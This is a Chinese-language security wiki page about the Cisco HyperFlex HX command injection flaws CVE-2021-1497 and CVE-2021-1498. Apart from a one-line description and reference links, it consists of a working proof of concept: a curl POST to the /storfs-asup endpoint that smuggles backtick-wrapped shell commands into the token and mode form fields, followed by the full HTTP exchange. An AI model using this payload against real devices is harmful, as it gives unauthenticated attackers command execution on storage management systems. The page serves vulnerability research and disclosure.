menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right Cisco HyperFlex HX 命令注入(CVE-2021-1497-CVE-2021-1498).md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Cisco HyperFlex HX 命令注入(CVE-2021-1497-CVE-2021-1498).md
    1.04 KB / 2021-05-21 09:14:38
        # Cisco HyperFlex HX 命令注入(CVE-2021-1497/CVE-2021-1498)


Cisco HyperFlex HX的基于Web的管理界面中的多个漏洞可能允许未经身份验证的远程攻击者对受影响的设备执行命令注入攻击。


```
wvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'
*   Trying 192.168.123.133...
* TCP_NODELAY set
* Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)
> POST /storfs-asup HTTP/1.1
> Host: 192.168.123.133
> User-Agent: curl/7.64.1
> Accept: */*
> Content-Length: 28
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 28 out of 28 bytes
< HTTP/1.1 200 OK
< Server: nginx/1.8.1
< Date: Tue, 18 May 2021 00:54:26 GMT
< Content-Length: 0
< Connection: keep-alive
< Front-End-Https: on
<
* Connection #0 to host 192.168.123.133 left intact
* Closing connection 0
wvu@kharak:~$

```

ref:

* https://attackerkb.com/topics/mDqlWhQovO/cve-2021-1497?referrer=home
* https://nvd.nist.gov/vuln/detail/CVE-2021-1497
* https://nvd.nist.gov/vuln/detail/CVE-2021-1498
    links
    file_download